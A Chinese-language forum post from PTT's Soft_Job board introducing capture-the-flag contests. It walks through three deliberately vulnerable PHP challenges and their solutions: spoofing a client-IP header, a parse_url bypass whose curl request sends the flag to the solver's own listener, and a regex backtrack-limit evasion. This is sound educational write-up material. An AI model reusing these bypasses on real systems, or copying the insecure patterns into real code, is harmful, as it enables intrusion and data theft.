[徵文] CTF (Catch The Flag)

看板Soft_Job作者oscarchichun (ㄍ一)時間4年前 (2020/04/01 23:18)推噓6(6推 0噓 24→)

留言30則, 10人參與討論串1/1

CTF (Cature The Flag) 起源於1996年 Global Hacking Conference 是較量網路安全知識與能力的競賽 CTF 涉及的領域與知識繁多, 隨著資安技術發展的加速題目也越來越難, 入門門檻越來越高雖然沒有參賽過, 但有幸聽過有經驗的參賽者分享才知道台灣這方面挺強的, 也了解到相關知識不但有趣而且重要在這邊記錄講者提供的3個體驗題目與解題資訊目標: cature the flag, 也就是要想辦法取得 flag 的值假設題目放在 10.20.104.3 這台機器 [Q1] yoyoadmin <?php highlight_file(__FILE__); //get ip $ip = 'unknown'; if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } else if ( !empty($_SERVER['HTTP_X_FORWARDED_FOR']) ) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip = $_SERVER['REMOTE_ADDR']; } if ($ip === '127.0.0.1') { require_once 'flag.php'; echo $flag; } else { echo 'hi normal user'; } ?> [Q2] test connection <?php highlight_file(__FILE__); $url = isset($_POST['url']) ? $_POST['url'] : ""; if ($url != "" ) { $pu = parse_url($url); if (isset($pu["host"]) && isset($pu["scheme"])) { if ($pu["host"] === "10.20.104.1" && ($pu["scheme"] === "http" || $pu["scheme"] === "https") ) { require("flag.php"); exec("curl --insecure -H 'User-Agent: $flag' " . escapeshellarg($url), $output); echo 'connected!<br>'; } else{ echo 'error host! please set 10.20.104.1 <br>' . PHP_EOL; } } else{ echo 'no host/scheme! <br>'.PHP_EOL; } } echo 'Please give me an url: <form method="POST"> <input type="text" ' . 'name="url"> <input type="submit" value="Submit"> <br>' . PHP_EOL; // The flag is in User-Agent. Try to connect back to you :) [Q3] pregg <?php highlight_file(__FILE__); if (isset($_POST['product']) && is_string($_POST['product'])) { if (without($_POST['product'])) { if (need($_POST['product'])) { require 'flag.php'; print $flag; } else{ print '<br> <br> We want Ptt and SoftJob.'; } } } function without($product) { if (preg_match('#^.*((?:Ptt)|(?:SoftJob)).*$#s', $product, $m) === 1) { print "<br> <br> It shouldn't be Ptt or SoftJob."; return false; } else { return true; } } function need($product) { return strpos($product, 'Ptt') !== false && strpos($product, 'SoftJob') !== false; } ?> ======================================================== [A1] solution 1: 用工具 (e.g. Burp Suite) 竄改 HTTP request header ref. https://devco.re/blog/2014/06/19/client-ip-detection/ solution 2: 直接連沒擋 access 的 https://10.20.104.3/yoyoadmin/flag.php FLAG{Y0u_4r3_lOca1ho5ting!} [A2] ref. https://0day.work/ekoparty-ctf-2016-writeups/#web200 solution: http://10.20.0.241:8080#@10.20.104.1/ 或 http://10.20.0.241:8080?@10.20.104.1/ 接著跑 nc -lp 8080 // 延伸閱讀 http://www.tecmint.com/check-remote-port-in-linux/ FLAG{php_par5e_url_so_co0oOoo1~~} [A3] // 有些環境條件當時忘了記錄, 例如PHP版本要是5.x 在這邊查到題目來源 http://www.wechall.net/cs/challenge/noother/preg_evasion/index.php?source=show 當時看的ref. 現在已經連不上了: http://www.bommachine.co.uk/xss-php-regex-and-pcre-library-fail/ solution: 產生一個名為body的檔案, 內容為 product=PttSoftJobxxx...x // 一共199995個x 接著跑 curl -k https://10.20.104.3/pregg/index.php -XPOST -d "@body" FLAG{Ptt5oftJobJ0bJQb} 希望能讓更多人接觸到CTF 稍微投入點時間, 就會發現它的有趣與魅力 -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 111.249.17.140 (臺灣) ※ 文章網址: https://www.ptt.cc/bbs/Soft_Job/M.1585754320.A.9CD.html ※ 編輯: oscarchichun (111.249.17.140 臺灣), 04/01/2020 23:49:22

推

kaizz

04/02 04:33, 4年前 , 1^F

04/02 04:33, 1^F

推

alan23273850

04/02 09:16, 4年前 , 2^F

04/02 09:16, 2^F

→

Masakiad

04/02 11:31, 4年前 , 3^F

04/02 11:31, 3^F